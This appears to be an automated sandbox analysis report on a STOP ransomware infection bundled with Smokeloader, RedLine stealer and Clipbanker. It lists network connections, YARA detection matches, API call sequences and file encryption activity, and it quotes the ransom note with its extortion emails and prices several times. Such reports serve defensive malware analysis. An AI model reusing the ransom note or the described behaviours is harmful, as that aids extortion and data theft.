Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 103.174.152.66:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.185.16.114:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49812 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: Yara match File source: 00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2343916720.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2344075429.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1710632872.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1982993082.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1710474391.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC, 10_2_004822E0

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\_readme.txt Dropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.Do not ask assistants from youtube and recovery data sites for help in recovering your data.They can use your free decryption quota and scam you.Our contact is emails in this text document only.You can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73Price of private key and decrypt software is $999.Discount 50% available if you contact us first 72 hours, that's price for you is $499.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshingmail.topReserve e-mail address to contact us:datarestorehelpyou@airmail.ccYour personal ID:0871PsawqSSLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P Jump to dropped file
Source: Yara match File source: Process Memory Space: E609.exe PID: 2764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: E609.exe PID: 5436, type: MEMORYSTR
Source: Yara match File source: 9.2.E609.exe.4a115a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.E609.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.E609.exe.4a815a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.E609.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.E609.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.E609.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.E609.exe.4a815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.E609.exe.4a115a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.E609.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.E609.exe.49e15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.E609.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: E609.exe PID: 6956, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: E609.exe PID: 7048, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: E609.exe PID: 2844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: E609.exe PID: 2764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: E609.exe PID: 5688, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: E609.exe PID: 5436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: E609.exe PID: 6008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: E609.exe PID: 3128, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: E609.exe PID: 916, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: E609.exe PID: 4956, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\E609.exe File moved: C:\Users\user\Desktop\XZXHAVGRAG\UMMBDNEQBN.xlsx Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe File deleted: C:\Users\user\Desktop\XZXHAVGRAG\UMMBDNEQBN.xlsx Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe File moved: C:\Users\user\Desktop\AIXACVYBSB\XZXHAVGRAG.pdf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe File deleted: C:\Users\user\Desktop\AIXACVYBSB\XZXHAVGRAG.pdf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe File moved: C:\Users\user\Desktop\DTBZGIOOSO\ONBQCLYSPU.xlsx Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe File dropped: C:\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\E609.exe File dropped: C:\$WinREAgent\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\E609.exe File dropped: C:\$WinREAgent\Scratch\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address Jump to dropped file
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe File dropped: C:\Users\user\AppData\Local\VirtualStore\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address Jump to dropped file
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe File dropped: C:\Users\user\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address Jump to dropped file

System Summary

barindex
Source: 32.2.mstsca.exe.8a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 32.2.mstsca.exe.8a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 35.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 35.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 26.2.build3.exe.9715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 26.2.build3.exe.9715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 35.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 35.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 28.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 28.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 28.2.build3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 28.2.build3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 26.2.build3.exe.9715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 26.2.build3.exe.9715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 32.2.mstsca.exe.8a15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 32.2.mstsca.exe.8a15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 19.2.build2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 18.2.build2.exe.2d915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 9.2.E609.exe.4a115a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.E609.exe.4a115a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 33.2.E609.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 33.2.E609.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 19.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 14.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 31.2.E609.exe.4a815a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 31.2.E609.exe.4a815a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.2.build2.exe.2d915a0.1.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 16.2.E609.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.E609.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 33.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 33.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.E609.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.E609.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.2.E609.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.E609.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 31.2.E609.exe.4a815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 31.2.E609.exe.4a815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.E609.exe.4a115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.E609.exe.4a115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 27.2.E609.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 27.2.E609.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.E609.exe.49e15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.E609.exe.49e15a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.E609.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.2.E609.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 27.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 27.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000020.00000002.2341456493.00000000008DC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000010.00000002.2076965546.000000000494A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001F.00000002.2266884728.00000000049E4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000022.00000002.2343916720.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000022.00000002.2344075429.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000E.00000002.2060271846.00000000049DC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.1710124459.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000004.00000002.1982585941.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000001A.00000002.2243695606.0000000000BBD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.1710342393.0000000002E4B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.1710632872.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000022.00000002.2343814651.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.1982993082.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.1982802841.0000000002F1B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.1710474391.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000012.00000002.2110277221.0000000002E0E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000022.00000002.2344257451.0000000002EBE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000019.00000002.2186670157.00000000049D3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000002.2029088899.0000000004976000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E609.exe PID: 6956, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E609.exe PID: 7048, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E609.exe PID: 2844, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E609.exe PID: 2764, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E609.exe PID: 5688, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E609.exe PID: 5436, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E609.exe PID: 6008, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E609.exe PID: 3128, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E609.exe PID: 916, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E609.exe PID: 4956, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004015D5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401603 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401603
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040161A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040161A
